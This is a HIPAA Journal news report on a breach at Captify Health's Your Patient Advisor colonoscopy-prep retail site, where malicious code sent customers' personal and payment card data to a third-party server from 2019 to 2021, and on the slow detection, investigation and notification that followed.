Captify Health Suffers 3-Year Breach of its Your Patient Advisor Website

Captify Health Suffers 3-Year Breach of its Your Patient Advisor Website
Posted By HIPAA Journal on Jan 10, 2023

Captify Health has recently started notifying users of its Your Patient Advisor online service that their sensitive information has been exposed and obtained by unauthorized individuals. In some cases, credit card information was stolen and misused. Captify Health prepares patients for their colonoscopy procedures by providing the colonoscopy preparation products recommended by doctors through its Your Patient Advisor service. As an online retailer, Captify Health collects customer information and processes debit/credit card payments through the website.

An external investigation into credit card fraud pointed to Captify Health as the source of a data breach. Captify Health was informed in March 2021 about the potential breach and conducted an internal investigation, with assistance provided by a third-party digital forensics firm. Malicious code was identified on the website which was transmitting the data of its customers to a third-party server. That information included full names, addresses, birth dates, payment card numbers, expiration dates, and security codes.

The forensic investigation revealed the initial breach of its website occurred on May 26, 2019, and lasted until April 20, 2021. During those 3 years, 244,296 individuals had used its service and potentially had their sensitive information stolen. According to the breach notification letters, sent via the Californian law firm Lewis Brisbois Bisgaard & Smith, there was an extensive investigation into a potential breach and it was determined on October 13, 2022, that malicious code had been added to its website. The affected individuals were then identified and contact information was verified, and breach notification letters were sent on December 16, 2022.

Captify Health said in its notification letters that “out of an abundance of caution, we have taken steps to ensure our platform is safe and secure for all purchases.” It is unclear how many individuals affected by the breach have experienced misuse of their credit card information. Captify Health has recommended customers carefully review their account statements for signs of fraudulent activity.


Retailers are often targeted to gain access to payment card information, as happened with the attack on the retailer Target, which resulted in the theft of the credit card details of 40 million customers via malware on its point-of-sale system. What stands out in the Captify Health breach is the length of time it took to identify the breach – almost three years; the time taken to investigate the potential breach and confirm a data breach had occurred – 19 months; and the time it took to issue notifications to affected individuals – more than two months (64 days) after confirming malicious code was confirmed as being present on its website, and 21 months after Captify Health was first notified about fraudulent credit card use.

The incident was reported to the Maine Attorney General on December 16, 2022, but it is not yet showing on the HHS’ Office for Civil Rights breach portal. Captify Health states in its website privacy policy that it is in full compliance with the HIPAA regulations and signs business associate agreements with doctors that use its service, which indicates the company is a business associate under HIPAA. A breach such as this has significant potential to cause serious reputational damage and puts Captify Health at risk of regulatory fines.